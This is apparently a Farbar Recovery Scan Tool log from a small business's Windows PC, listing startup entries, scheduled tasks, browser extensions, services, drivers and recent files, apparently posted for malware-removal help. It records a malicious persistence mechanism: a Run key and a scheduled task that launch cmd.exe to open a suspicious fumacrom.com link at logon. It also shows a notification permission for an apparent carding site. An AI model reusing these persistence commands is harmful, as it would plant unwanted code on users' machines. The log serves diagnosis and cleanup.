HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [6787856 2019-03-19] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
HKU\S-1-5-19\...\Run: [GoogleDriveFS] => C:\Program Files\Google\Drive File Stream\54.0.2.0\GoogleDriveFS.exe [55330648 2021-12-14] (Google LLC -> Google, Inc.)
HKU\S-1-5-20\...\Run: [GoogleDriveFS] => C:\Program Files\Google\Drive File Stream\54.0.2.0\GoogleDriveFS.exe [55330648 2021-12-14] (Google LLC -> Google, Inc.)
HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\...\Run: [GoogleDriveSync] => C:\Program Files\Google\Drive\googledrivesync.exe [49952424 2021-10-19] (Google LLC -> )
HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\...\Run: [com.squirrel.Teams.Teams] => C:\Users\Spices\AppData\Local\Microsoft\Teams\Update.exe [1789768 2019-09-05] (Microsoft 3rd Party Application Component -> Microsoft Corporation)
HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [35342976 2021-11-12] (Piriform Software Ltd -> Piriform Software Ltd)
HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\...\Run: [CCleanerBrowserAutoLaunch_EBA6280FE373BC45FCF9CDB43D2FE029] => C:\Program Files (x86)\CCleaner Browser\Application\CCleanerBrowser.exe [2521976 2021-12-15] (Piriform Software Ltd -> Piriform Software)
HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\...\Run: [GoogleDriveFS] => C:\Program Files\Google\Drive File Stream\54.0.2.0\GoogleDriveFS.exe [55330648 2021-12-14] (Google LLC -> Google, Inc.)
HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\...\Run: [prueba] => C:\Windows\System32\cmd.exe /c start hxxp://fumacrom.com/2OEsQ & start chrome.exe hxxp://fumacrom.com/2OEsQ & exit
HKU\S-1-5-18\...\Run: [GoogleDriveFS] => C:\Program Files\Google\Drive File Stream\54.0.2.0\GoogleDriveFS.exe [55330648 2021-12-14] (Google LLC -> Google, Inc.)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{052EB454-9F19-CB42-7875-807F79F311C4}] -> C:\Program Files (x86)\CCleaner Browser\Application\96.1.13589.113\Installer\chrmstp.exe [2021-12-16] (Piriform Software Ltd -> Piriform Software)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\96.0.4664.110\Installer\chrmstp.exe [2021-12-27] (Google LLC -> Google LLC)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Intuit Data Protect.lnk [2018-03-02]
ShortcutTarget: Intuit Data Protect.lnk -> C:\Program Files (x86)\Common Files\Intuit\DataProtect\IntuitDataProtect.exe (Intuit, Inc. -> Intuit Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks Update Agent.lnk [2018-03-02]
ShortcutTarget: QuickBooks Update Agent.lnk -> C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe (Intuit, Inc. -> Intuit Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks_Standard_21.lnk [2018-03-02]
ShortcutTarget: QuickBooks_Standard_21.lnk -> C:\Program Files (x86)\Intuit\QuickBooks 2017\QBW32.EXE (Intuit, Inc. -> Intuit Inc.)
BootExecute: autocheck autochk * sdnclean64.exe
HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {039253AA-5B78-4664-AD5B-090B2EB894A7} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [22797704 2021-12-10] (Microsoft Corporation -> Microsoft Corporation)
Task: {0C42F339-DE3B-4B39-9229-AD7686DAE33C} - System32\Tasks\McAfee Remediation (Prepare) => C:\Program Files\Common Files\AV\McAfee VirusScan\upgrade.exe /prepare (No File)
Task: {0DC2831A-CD47-4EDD-9E1F-7F0811FB2666} - System32\Tasks\EOSv3 Scheduler onLogOn => C:\Users\Spices\AppData\Local\ESET\ESETOnlineScanner\ESETOnlineScanner.exe [19989464 2021-12-17] (ESET, spol. s r.o. -> ESET)
Task: {108E5EEF-1416-490B-BECD-6B517DE592B4} - System32\Tasks\QBScheduledReport => C:\Program Files (x86)\Common Files\Intuit\QuickBooks\ScheduledReports\ScheduledReports.Scheduler.exe [390752 2018-05-24] (Intuit, Inc. -> )
Task: {16ABA61A-37EB-4938-AF3F-F5606E57E4B7} - System32\Tasks\HPCustParticipation HP ColorLaserJet MFP M278-M281 => C:\Program Files\HP\HP ColorLaserJet MFP M278-M281\Bin\HPCustPartic.exe [6660232 2017-07-08] (Hewlett Packard -> HP Inc.)
Task: {1C32CCF5-1FAE-4552-A8D5-E9DC003D51F5} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [684976 2021-11-12] (Piriform Software Ltd -> Piriform)
Task: {34DD9A81-9F82-460A-84A3-DF42A9D617DA} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [6332312 2021-12-20] (Microsoft Corporation -> Microsoft Corporation)
Task: {3C9BEDBE-D3A6-446B-AAED-540A66B14AD2} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe /platui /runkey (No File)
Task: {44E31BDF-C1F8-4CB0-A4F4-DA41E40558A5} - System32\Tasks\CCleanerUpdateTaskMachineCore => C:\Program Files (x86)\CCleaner Browser\Update\CCleanerBrowserUpdate.exe [200928 2021-03-08] (Piriform Software Ltd -> Piriform Software)
Task: {460821D5-BFE3-4F2F-9758-085899A335D1} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-07] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {46402D04-2440-4BE4-BB46-66B6BD0DDD85} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [6332312 2021-12-20] (Microsoft Corporation -> Microsoft Corporation)
Task: {485A3962-3D24-457B-837A-26851AF83E31} - System32\Tasks\GoogleUpdateTaskMachineUA1d57d83328d7164 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-03-01] (Google Inc -> Google Inc.)
Task: {4C985A3A-6B95-45DE-BAA9-7E26EE7EBE7B} - System32\Tasks\CCleaner Browser Heartbeat Task (Logon) => C:\Program Files (x86)\CCleaner Browser\Application\CCleanerBrowser.exe [2521976 2021-12-15] (Piriform Software Ltd -> Piriform Software)
Task: {6A7ECE0B-9827-486D-AF1A-39BE5A9CFC85} - System32\Tasks\CCleanerSkipUAC - Spices => C:\Program Files\CCleaner\CCleaner.exe [29417088 2021-11-12] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {6D015A8F-951B-4109-8D67-ADAEBA881EEB} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [108872 2021-12-20] (Microsoft Corporation -> Microsoft Corporation)
Task: {7869D64A-0452-42D8-83C8-E4E5D719F034} - System32\Tasks\CCleanerUpdateTaskMachineUA => C:\Program Files (x86)\CCleaner Browser\Update\CCleanerBrowserUpdate.exe [200928 2021-03-08] (Piriform Software Ltd -> Piriform Software)
Task: {7EEFF157-BBB7-409E-96A2-38481ADE1B3E} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [22797704 2021-12-10] (Microsoft Corporation -> Microsoft Corporation)
Task: {995E66AE-6FA4-4A54-B879-71E0781E6492} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-03-01] (Google Inc -> Google Inc.)
Task: {A559BF25-2AD5-4E2C-A24F-6C68836C60B9} - System32\Tasks\TAREAAA => C:\Windows\System32\cmd.exe /c start http://fumacrom.com/2OEsQ & start chrome.exe http://fumacrom.com/2OEsQ & exit <==== ATTENTION
Task: {B08979CE-A5ED-469E-B345-A0046CE248EA} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-07] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {B0A6D467-7160-49B6-8885-6671F90ED86F} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonx86\Microsoft Shared\Office16\OLicenseHeartbeat.exe [1171352 2021-12-20] (Microsoft Corporation -> Microsoft Corporation)
Task: {BD3DD03D-FB9D-487D-BE28-E8B12DDA2EFE} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-03-01] (Google Inc -> Google Inc.)
Task: {CF64EA8E-7310-4C18-B459-031A11221479} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe [6189624 2020-04-26] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
Task: {DA4F6040-81E8-4A20-8FCE-B89E1C5B570A} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1562376 2021-08-16] (Adobe Inc. -> Adobe Inc.)
Task: {DADBD5E7-D9CA-441A-AB7E-F6347C372C30} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe [5723640 2019-09-04] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
Task: {E48C79DA-9E34-41B6-9362-07272B7F8EAA} - System32\Tasks\EOSv3 Scheduler onTime => C:\Users\Spices\AppData\Local\ESET\ESETOnlineScanner\ESETOnlineScanner.exe [19989464 2021-12-17] (ESET, spol. s r.o. -> ESET)
Task: {E4CA4FF1-C660-4FFB-8609-01654D6EC8D3} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-07] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {F1DCB98F-90BA-480A-AD7F-003C37617A59} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [108872 2021-12-20] (Microsoft Corporation -> Microsoft Corporation)
Task: {F7F0B0D8-23B1-4ADF-B635-7C94D16F8424} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe [7177168 2020-04-26] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
Task: {F89C6FF2-740E-4501-B3AE-CC3081FAE533} - System32\Tasks\CCleaner Browser Heartbeat Task (Hourly) => C:\Program Files (x86)\CCleaner Browser\Application\CCleanerBrowser.exe [2521976 2021-12-15] (Piriform Software Ltd -> Piriform Software)
Task: {FAC4AD18-8B9E-45B3-B5B3-EE58157AF3D4} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MpCmdRun.exe [901048 2021-12-07] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {FCE71A75-54D5-4627-8883-30E8AA858F65} - System32\Tasks\GoogleUpdateTaskMachineCore1d57d833276a9b3 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-03-01] (Google Inc -> Google Inc.)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 209.18.47.62 209.18.47.61
Tcpip\..\Interfaces\{5b9964f8-767b-4972-b670-9378d339e097}: [DhcpNameServer] 209.18.47.62 209.18.47.61

Edge: 
=======
DownloadDir: C:\Users\Spices\Downloads
Edge Notifications: HKU\S-1-5-21-1001776605-1151265979-3107129937-1001 -> hxxps://www.cvvshop.lv; hxxps://mail.google.com
Edge Extension: (No Name) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [not found]
Edge Extension: (No Name) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [not found]
Edge Extension: (No Name) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [not found]
Edge Extension: (No Name) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [not found]
Edge DefaultProfile: Default
Edge Profile: C:\Users\Spices\AppData\Local\Microsoft\Edge\User Data\Default [2022-01-06]
Edge Extension: (Malwarebytes Browser Guard) - C:\Users\Spices\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ihcjicgdanjaechkgeegckofjjedodee [2021-12-15]
Edge HKLM-x32\...\Edge\Extension: [ihcjicgdanjaechkgeegckofjjedodee]

FireFox:
========
FF DefaultProfile: 4t2gzap5.default
FF ProfilePath: C:\Users\Spices\AppData\Roaming\Mozilla\Firefox\Profiles\4t2gzap5.default [2021-12-27]
FF ProfilePath: C:\Users\Spices\AppData\Roaming\Mozilla\Firefox\Profiles\ijhul9ag.default-release [2021-12-30]
FF Plugin: @java.com/DTPlugin,version=11.201.2 -> C:\Program Files\Java\jre1.8.0_201\bin\dtplugin\npDeployJava1.dll [2020-01-30] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.201.2 -> C:\Program Files\Java\jre1.8.0_201\bin\plugin2\npjp2.dll [2020-01-30] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: Adobe Acrobat -> C:\Program Files\Adobe\Acrobat DC\Acrobat\Air\nppdf32.dll [2021-10-05] (Adobe Inc. -> Adobe Systems Inc.)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2021-10-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2021-10-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @update.ccleanerbrowser.com/CCleaner Browser;version=3 -> C:\Program Files (x86)\CCleaner Browser\Update\1.8.1067.0\npCCleanerBrowserUpdate3.dll [2021-03-08] (Piriform Software Ltd -> Piriform Software)
FF Plugin-x32: @update.ccleanerbrowser.com/CCleaner Browser;version=9 -> C:\Program Files (x86)\CCleaner Browser\Update\1.8.1067.0\npCCleanerBrowserUpdate3.dll [2021-03-08] (Piriform Software Ltd -> Piriform Software)
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\eset_security_config_overlay.js [2021-12-27]

Chrome: 
=======
CHR Profile: C:\Users\Spices\AppData\Local\Google\Chrome\User Data\Default [2022-01-06]
CHR Extension: (Adobe Acrobat) - C:\Users\Spices\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2021-12-27]
CHR Extension: (Avast SafePrice | Comparison, deals, coupons) - C:\Users\Spices\AppData\Local\Google\Chrome\User Data\Default\Extensions\eofcbnmajmjmplflapaojjnihcjkigck [2021-12-27]
CHR Extension: (Malwarebytes Browser Guard) - C:\Users\Spices\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihcjicgdanjaechkgeegckofjjedodee [2021-12-27]
CHR Extension: (Application Launcher For Drive (by Google)) - C:\Users\Spices\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2021-12-27]
CHR Extension: (AVG SafePrice | Comparison, deals, coupons) - C:\Users\Spices\AppData\Local\Google\Chrome\User Data\Default\Extensions\mbckjcfnjmoiinpgddefodcighgikkgn [2021-12-27]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Spices\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-12-27]
CHR HKU\S-1-5-21-1001776605-1151265979-3107129937-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj]
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck]
CHR HKLM-x32\...\Chrome\Extension: [ihcjicgdanjaechkgeegckofjjedodee]
CHR HKLM-x32\...\Chrome\Extension: [mbckjcfnjmoiinpgddefodcighgikkgn]

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S4 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [169728 2021-08-16] (Adobe Inc. -> Adobe Inc.)
S4 ccleaner; C:\Program Files (x86)\CCleaner Browser\Update\CCleanerBrowserUpdate.exe [200928 2021-03-08] (Piriform Software Ltd -> Piriform Software)
S4 CCleanerBrowserElevationService; C:\Program Files (x86)\CCleaner Browser\Application\96.1.13589.113\elevation_service.exe [1721904 2021-12-15] (Piriform Software Ltd -> Piriform Software)
S4 ccleanerm; C:\Program Files (x86)\CCleaner Browser\Update\CCleanerBrowserUpdate.exe [200928 2021-03-08] (Piriform Software Ltd -> Piriform Software)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [12129128 2021-12-10] (Microsoft Corporation -> Microsoft Corporation)
R2 ekrn; C:\Program Files\ESET\ESET Security\ekrn.exe [3141480 2021-12-10] (ESET, spol. s r.o. -> ESET)
R3 ekrnEpfw; C:\Program Files\ESET\ESET Security\ekrn.exe [3141480 2021-12-10] (ESET, spol. s r.o. -> ESET)
S4 HPPrintScanDoctorService; C:\Program Files\HPPrintScanDoctor\HPPrintScanDoctorService.exe [299680 2021-11-01] (HP Inc. -> HP Inc.)
S3 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe [7901368 2021-12-10] (Malwarebytes Inc -> Malwarebytes)
S4 QBFCService; C:\Program Files (x86)\Common Files\Intuit\QuickBooks\FCS\Intuit.QuickBooks.FCS.exe [65536 2016-08-23] (Intuit Inc.) [File not signed]
R3 QuickBooksDB27; C:\Program Files (x86)\Intuit\QuickBooks 2017\QBDBMgrN.exe [134296 2020-02-20] (SAP -> SAP AG or an SAP affiliate company)
S4 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [2747312 2020-04-26] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
S4 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [4583240 2020-04-26] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [940976 2019-09-04] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [6138112 2021-12-15] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [12986664 2021-12-17] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\NisSrv.exe [2876152 2021-12-07] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MsMpEng.exe [128360 2021-12-07] (Microsoft Windows Publisher -> Microsoft Corporation)

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 AppleLowerFilter; C:\WINDOWS\System32\drivers\AppleLowerFilter.sys [35976 2020-10-09] (WDKTestCert build,132303256403278908 -> Apple Inc.)
S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [279040 2019-12-07] (Microsoft Corporation) [File not signed]
S3 BthHFEnum; C:\WINDOWS\System32\drivers\bthhfenum.sys [144896 2019-12-07] (Microsoft Corporation) [File not signed]
R1 eamonm; C:\WINDOWS\System32\DRIVERS\eamonm.sys [183408 2021-10-27] (ESET, spol. s r.o. -> ESET)
R0 edevmon; C:\WINDOWS\System32\DRIVERS\edevmon.sys [124496 2021-10-27] (ESET, spol. s r.o. -> ESET)
S0 eelam; C:\WINDOWS\System32\DRIVERS\eelam.sys [15824 2021-10-25] (Microsoft Windows Early Launch Anti-malware Publisher -> ESET)
R1 ehdrv; C:\WINDOWS\system32\DRIVERS\ehdrv.sys [201984 2021-10-27] (ESET, spol. s r.o. -> ESET)
R2 ekbdflt; C:\WINDOWS\system32\DRIVERS\ekbdflt.sys [43920 2021-10-27] (ESET, spol. s r.o. -> ESET)
R1 epfw; C:\WINDOWS\system32\DRIVERS\epfw.sys [69736 2021-10-27] (ESET, spol. s r.o. -> ESET)
R1 epfwwfp; C:\WINDOWS\system32\DRIVERS\epfwwfp.sys [107456 2021-10-27] (ESET, spol. s r.o. -> ESET)
R1 googledrivefs3525; C:\WINDOWS\System32\DRIVERS\googledrivefs3525.sys [389640 2021-08-09] (Google LLC -> Google, Inc.)
R1 googledrivefs3688; C:\WINDOWS\System32\DRIVERS\googledrivefs3688.sys [381456 2021-12-14] (Microsoft Windows Hardware Compatibility Publisher -> Google, Inc.)
S0 MbamElam; C:\WINDOWS\System32\DRIVERS\MbamElam.sys [19912 2021-12-10] (Microsoft Windows Early Launch Anti-malware Publisher -> Malwarebytes)
S3 MBAMSwissArmy; C:\WINDOWS\System32\Drivers\mbamswissarmy.sys [248992 2021-12-10] (Malwarebytes Inc -> Malwarebytes)
S0 Spybot3ELAM; C:\WINDOWS\System32\drivers\Spybot3ELAM.sys [19904 2019-06-21] (Microsoft Windows Early Launch Anti-malware Publisher -> Windows (R) Win 7 DDK provider)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [48536 2021-12-07] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [435432 2021-12-07] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [86248 2021-12-07] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) (Whitelisted) =========

(If an entry is included in the fixlist, the file/folder will be moved.)

2022-01-06 08:10 - 2022-01-06 08:41 - 000000000 ____D C:\FRST
2022-01-06 07:58 - 2022-01-06 07:58 - 002311168 _____ (Farbar) C:\Users\Spices\Downloads\FRST64 (1).exe
2022-01-05 16:43 - 2022-01-05 16:43 - 002109918 _____ C:\Users\Spices\Downloads\CUSMA EL MONTE  DEC 27-2021-25612.pdf
2022-01-05 12:18 - 2022-01-05 12:18 - 000924333 _____ C:\Users\Spices\Downloads\12-22-21 INVOICE # 9761.pdf
2022-01-05 12:18 - 2022-01-05 12:18 - 000905087 _____ C:\Users\Spices\Downloads\12-29-21 INOVOICE# 9772.pdf
2022-01-05 12:18 - 2022-01-05 12:18 - 000743867 _____ C:\Users\Spices\Downloads\12-23-21 INVOICE# 9771.pdf
2022-01-05 11:01 - 2022-01-05 11:01 - 000000000 ____D C:\Users\Spices\Documents\QBBackupTemp Wed, Jan 05 2022 11 01 04 AM
2022-01-04 17:10 - 2022-01-04 17:10 - 000092238 _____ C:\Users\Spices\Downloads\elmo 0231351.pdf
2022-01-04 14:20 - 2022-01-04 14:20 - 000034138 _____ C:\Users\Spices\Downloads\po_lspo (28).pdf
2022-01-04 13:05 - 2022-01-04 13:05 - 000070425 _____ C:\Users\Spices\Downloads\Inv_32230_from_REHAN_SPICES_CORP_11548.pdf
2022-01-04 09:26 - 2022-01-04 09:26 - 000142812 _____ C:\Users\Spices\Downloads\179Purchase Orders (4) (1).pdf
2022-01-04 09:21 - 2022-01-04 09:21 - 000230668 _____ C:\Users\Spices\Downloads\2022--0-1--checkdownload-6070.pdf
2022-01-03 16:09 - 2022-01-03 16:09 - 000010951 _____ C:\Users\Spices\Downloads\Invoice_INV11934_1640050871611.pdf
2022-01-03 10:47 - 2022-01-03 10:47 - 000005669 _____ C:\Users\Spices\Downloads\PO538462.xlsx
2022-01-03 09:40 - 2022-01-03 09:40 - 000005668 _____ C:\Users\Spices\Downloads\PO538281.xlsx
2022-01-03 08:55 - 2022-01-03 08:55 - 000005666 _____ C:\Users\Spices\Downloads\PO538264.xlsx
2022-01-03 08:52 - 2022-01-03 08:52 - 000051446 _____ C:\Users\Spices\Downloads\ConfirmationOutgoing(Deal)MultiPDF's_222551[12-31-2021_100939_AM] .pdf
2022-01-03 07:44 - 2022-01-03 07:44 - 000003188 _____ C:\Users\Spices\Downloads\35005949.pdf
2021-12-30 10:19 - 2021-12-30 10:19 - 000259033 _____ C:\Users\Spices\Downloads\EL MONTE INV # 8397 PO# 2765.pdf
2021-12-30 09:38 - 2021-12-30 09:38 - 000000020 ___SH C:\Users\TEMP.DESKTOP-RLQ6923.005\ntuser.ini
2021-12-30 09:38 - 2021-12-30 09:38 - 000000000 ____D C:\Users\TEMP.DESKTOP-RLQ6923.005
2021-12-30 09:38 - 2021-12-22 07:51 - 000001902 _____ C:\Users\TEMP.DESKTOP-RLQ6923.005\Desktop\Google Slides.lnk
2021-12-30 09:38 - 2021-12-22 07:51 - 000001902 _____ C:\Users\TEMP.DESKTOP-RLQ6923.005\Desktop\Google Sheets.lnk
2021-12-30 09:38 - 2021-12-22 07:51 - 000001890 _____ C:\Users\TEMP.DESKTOP-RLQ6923.005\Desktop\Google Docs.lnk
2021-12-30 09:38 - 2018-03-23 02:00 - 000000000 ____D C:\Users\TEMP.DESKTOP-RLQ6923.005\AppData\Local\Google
2021-12-30 09:37 - 2021-12-30 09:45 - 000245792 _____ C:\TDSSKiller.3.1.0.28_30.12.2021_09.37.01_log.txt
2021-12-30 09:26 - 2021-12-30 09:28 - 000006288 _____ C:\TDSSKiller.3.1.0.28_30.12.2021_09.26.44_log.txt
2021-12-30 09:26 - 2021-12-30 09:26 - 005054744 _____ (AO Kaspersky Lab) C:\Users\Spices\Downloads\tdsskiller.exe
2021-12-30 08:52 - 2021-12-30 09:16 - 000000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2021-12-30 08:52 - 2021-12-30 08:52 - 000255928 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\13364584.sys
2021-12-30 08:52 - 2021-12-30 08:52 - 000192952 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2021-12-30 08:51 - 2021-12-30 08:52 - 014178840 _____ (Malwarebytes Corp.) C:\Users\Spices\Downloads\mbar-1.10.3.1001.exe
2021-12-30 08:18 - 2021-12-30 08:22 - 000000000 ____D C:\ProgramData\HitmanPro
2021-12-30 08:17 - 2021-12-30 08:18 - 014609344 _____ (SurfRight B.V.) C:\Users\Spices\Downloads\HitmanPro_x64.exe
2021-12-29 14:36 - 2021-12-29 14:36 - 000070092 _____ C:\Users\Spices\Downloads\PO#680922 INV#5509 OK Empaque.pdf
2021-12-29 14:36 - 2021-12-29 14:36 - 000059295 _____ C:\Users\Spices\Downloads\BL#5508 El Monte Empaque.pdf
2021-12-29 12:41 - 2021-12-29 12:41 - 000217357 _____ C:\Users\Spices\Downloads\ELMONTE.pdf
2021-12-29 11:06 - 2021-12-29 11:06 - 000010774 _____ C:\Users\Spices\Downloads\Invoice_INV12082_1640715334067.pdf
2021-12-29 09:03 - 2021-12-29 09:03 - 000005670 _____ C:\Users\Spices\Downloads\PO537837.xlsx
2021-12-27 12:20 - 2021-12-27 12:20 - 000037493 _____ C:\Users\Spices\Downloads\trk1080567621.pdf
2021-12-27 12:16 - 2021-12-27 12:16 - 000120945 _____ C:\Users\Spices\Downloads\Inv_72980_from_Superior_Packaging_Solutions_Inc._19336.pdf
2021-12-27 09:34 - 2021-12-27 09:34 - 000043388 _____ C:\Users\Spices\Downloads\Report_from_REHAN_SPICES_CORP (6).pdf
2021-12-27 09:31 - 2021-12-27 09:32 - 000074620 _____ C:\Users\Spices\Downloads\Inv_31967_from_REHAN_SPICES_CORP_3800 (1).pdf
2021-12-27 09:02 - 2021-12-27 09:02 - 000002326 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
